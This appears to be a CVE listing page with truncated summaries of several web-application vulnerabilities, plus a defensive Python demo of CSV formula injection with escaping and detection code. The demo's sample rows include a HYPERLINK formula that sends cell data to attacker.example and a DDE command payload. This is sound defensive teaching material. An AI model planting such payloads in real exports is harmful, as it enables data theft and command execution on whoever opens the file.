CVE-2022-3536 The Role Based Pricing plugin before 1.6.3 has no authorization or validation checks, which allows any authenticated user to perform a phar deserialization attack.
When they can upload a file and a suitable gadget chain (such as Google Analytics) is present on the blog, the attacker can inject malicious code.
CVE-2022-3558 The Import and export users and customers WordPress plugin before 1.20.5 does not properly escape data when exporting it via CSV files, which can lead to CSV injection.
This is a serious issue because it can lead to security problems when the exported data is opened or processed by other applications or services, such as spreadsheet software. This
CVE-2022-39387 - Breaking into XWiki via OpenID Connect Parameter Tampering
In late 2022, a critical vulnerability was discovered in XWiki's OpenID Connect (OIDC) authentication module. XWiki, an open-source enterprise wiki and knowledge management
CVE-2022-22425 - Exploiting CSV Injection in IBM InfoSphere Information Server 11.7
CSV (Comma-Separated Values) files are one of the simplest and most common ways to share tabular data. But with this simplicity comes a severe security
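The two CSV entries above (CVE-2022-3558 and CVE-2022-22425) share the same root cause: an exporter writes user-controlled values into a CSV without neutralising cells that a spreadsheet will evaluate as formulas. The following Python is an added example, not code from either affected product (the WordPress plugin is PHP and InfoSphere is Java): it shows the vulnerable pass-through export beside the hardened one, plus a detection helper that reports which cells of an existing export would be evaluated. The sample rows and the `attacker.example` host are constructed for the demonstration.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets treat as the
# start of a formula (tab and carriage return are also honoured by Excel).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export: the "display_name" of two accounts carries a
# formula payload of the kind an attacker can set in a user profile.
SAMPLE_ROWS = [
    ["user_login", "display_name", "balance"],
    ["alice", "Alice Smith", "12.50"],
    ["mallory", '=HYPERLINK("http://attacker.example/?c="&A1,"Click me")', "-5"],
    ["eve", "+cmd|' /C calc'!A0", "0"],
]


def _is_plain_number(text):
    """'-5' or '+1e3' is a signed number, not a formula; leave it untouched."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def is_formula_like(text):
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    # Spreadsheets ignore leading spaces before the trigger character.
    stripped = text.lstrip(" ")
    return stripped.startswith(FORMULA_TRIGGERS) and not _is_plain_number(stripped)


def escape_cell(value):
    """Neutralise formula injection by prefixing a single quote, which
    spreadsheet applications interpret as 'treat this cell as text'."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_csv(rows, escape=True):
    """Write rows as CSV. escape=False reproduces the vulnerable behaviour:
    values are quoted for CSV syntax but formulas are passed through."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(c) if escape else c for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Detection helper: (row, column) of every cell that would be evaluated."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c))
    return hits


if __name__ == "__main__":
    print("vulnerable export flags:", find_formula_cells(export_csv(SAMPLE_ROWS, escape=False)))
    print("hardened export flags:", find_formula_cells(export_csv(SAMPLE_ROWS)))
    print(export_csv(SAMPLE_ROWS))
```

Note that CSV quoting alone (`QUOTE_ALL`) does nothing against formula injection: the vulnerable export is syntactically valid CSV and still carries both payloads. The single-quote prefix is the escaping the affected exporters lacked; it is visible to the user in the opened cell, which is the accepted trade-off, and the number exemption keeps legitimate negative balances readable.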
CVE-2021-45446 - Hidden Property Fails in Pentaho Server, Exposing Sensitive Directory Listings
In late 2021, a security flaw (CVE-2021-45446) was discovered in Hitachi Vantara Pentaho Business Analytics Server. This post dives into what makes this vulnerability dangerous,